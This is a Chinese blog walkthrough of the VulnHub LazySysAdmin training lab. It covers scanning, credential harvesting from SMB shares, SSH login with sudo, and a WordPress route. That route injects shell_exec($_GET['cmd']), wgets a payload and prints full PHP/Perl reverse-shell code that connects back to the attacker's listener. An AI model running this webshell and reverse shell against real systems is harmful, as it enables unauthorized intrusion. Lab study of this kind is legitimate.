前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >带妹玩转vulnhub(一)

带妹玩转vulnhub(一)

作者头像
用户5878089
发布2019-07-25 16:08:41
1.2K0
发布2019-07-25 16:08:41
举报

前言

题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。

带妹是不可能带妹的,这辈子都不可能带妹的?

开始

下载

我们首先需要下载LazySysAdmin的虚拟镜像,这里 但是打开之后是ovf mf vmdk三种格式的文件,刚开始比较懵,不知道用什么虚拟机打开,于是上网找了一点相关资料 也就是说需要用VMware打开

基本配置

其实这个环境不需要怎么配置,只需设置好网络连接方式即可,使其和我们的攻击机在同一个局域网中。

渗透测试

ip扫描

我这里使用的攻击机为kali。 首先使用netdiscover进行主机发现,当然使用nmap也可以,但是速度稍微有点慢,况且第一步以扫描ip为主。

根据mac地址和现有的已知信息,可以得到ip:192.168.43.167

端口扫描

nmap -A 192.168.43.160

从中可以得到很多有用的信息

很明显可以看出来是一个windows操作系统,并且开启了SSH,Mysql,InsplRCd,Smb等服务。 先是登上网站看看有没有什么发现. 在kali下使用DirBuster进行目录扫描,对于我这种菜?,连怎么配置都百度了一番参考链接

我这里的配置如下图

最后扫描结果

可以很明显的看到有phpmyadmin和wordpress 尝试爆破phpMyadmin的口令

开始

使用WpScan进行扫描

使用WpScan扫描wordpress,我也不会用,所以还是放上一个参考链接

wpscan --url http://192.168.43.167/wordpress --enumerate u

最后也仅仅只是知道了一个用户名为admin

使用enum4linux进行扫描

因为远程主机开启了445和irc服务,这都是用于windows和linux进行通信的服务。 enum4linux 192.168.43.167 主要的信息如下

InspIRCd登陆

首先让我们了解一下InspIRCd是什么东西。

InspIRCd是一款现代化,快速的IRC服务器,也是少数几个IRC服务器应用程序之一,可提供高性能和稳定性,并以C ++编写。 它是在您的服务器上构建自己的IRC的最佳解决方案之一。 它支持两个加密库,OpenSSL和gnutls,并支持许多服务,如anope主题。 InspIRCd基于提供许多模块的模块化IRCd。 如果要在InspIRCd上启用模块,则只需编辑modules.conf文件,并为模块添加新行。

以上内容来自此处 我们只需在kali下安装其客户端即可,

irssi /connect 192.168.43.167 6667 123 root建立链接

smb协议登陆

可以知道远程主机共享了print share两个文件夹,用户名为KAZYSYSADMIN并且密码很可能是5位数。接下来可以使用smb协议进行访问共享文件。 可以采用三种方式访问smb服务,参考链接 最后成功的访问到了share文件夹,可以看到这就是网站的源代码

获取信息

通常我们会查看一些配置文件,很明显现在我们获得到了关键的信息

而且通常来说MySql的用户名密码也就是phpMyAdmin的密码 尝试登陆phpMyAdmin,但是并没有什么发现

ssh登陆

这时候回想一下我们所收集到的信息,还有一个ssh没有使用,并且有一个12345这样的密码,所以尝试ssh登陆。 ssh togie@192.168.43.167

发现有sudo的权限,切换为root用户,最后得到对应的信息。

结束?

其实到这里已经可以结束了,但是我看网上一些文章中还有另一种办法,没想到ssh的用户名密码在wordpress中同样的适用,所以在渗透测试时,要将手中的信息都进行测试,用户往往会采用相同的用户名和密码。

方法二

虽然我们在phpmyadmin中无法操作,但是wordpress同样可以尝试进行登陆。 现在有必要罗列一下我们手中所拥有的信息了。

未知的密码12345

未知的用户名togie

数据库的用户名Admin,密码TogieMYSQL12345^^

两两结合进行测试,很快便可以试出用户名和密码 对于web我真的是一窍不通,就算拿到了wordpress的控制面板,我也不知道该如何上传shell,只能照着网上的文章一步一步的照做了。 我通过Gist创建了一个反向shell,并对本地端口进行监听。

第一步执行命令回显

// And then randomly choose a line $lyrics = "<pre>".shell_exec($_GET['cmd'])."</pre>"; return wptexturize($lyrics);

这段代码的作用就是使其可以命令执行(来自一位小菜的解释) 特地上网百度了一番RCE是远程代码执行的意思? 找到一个可以访问的php,然后写上shell就可以了。。?

真的很小白

第二步上传反向shell

<?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function cf($fname,$text){ if($fp=@fopen($fname,'w')) { @fputs($fp,@base64_decode($text)); @fclose($fp); } } $yourip = "192.168.43.93"; //修改这里 $yourport = "2333"; // 修改这里 $usedb = array('perl'=>'perl','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; cf('/tmp/.bc',$back_connect); $res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); ?>

网上找的反向shell的小马

192.168.43.167/wordpress/wp-admin/index.php?cmd=wget https://gist.githubusercontent.com/jsk2017/b6f4eb6dc6a8250d16f34d4cdbd42eb7/raw/66ba2bb4dd08304aeace90ce2389bddb0d0d36c6/rev.php

第三步访问指定的网址

访问 192.168.43.167/wordpress/wp-admin/rev.php便可以拿到shell 本地通过

nc -lnvp 2333

进行监听

总结

今天先是简单认识了一下VulnHub的使用,也学到了很多渗透测试工具?,接下来让我们一起面对更加真实的世界!

带妹是不可能带妹的,不过黑妹子电脑?才是王道!

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-04-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 无级安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
网站建设
网站建设(Website Design Service,WDS),是帮助您快速搭建企业网站的服务。通过自助模板建站工具及专业设计服务,无需了解代码技术,即可自由拖拽模块,可视化完成网站管理。全功能管理后台操作方便,一次更新,数据多端同步,省时省心。使用网站建设服务,您无需维持技术和设计师团队,即可快速实现网站上线,达到企业数字化转型的目的。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档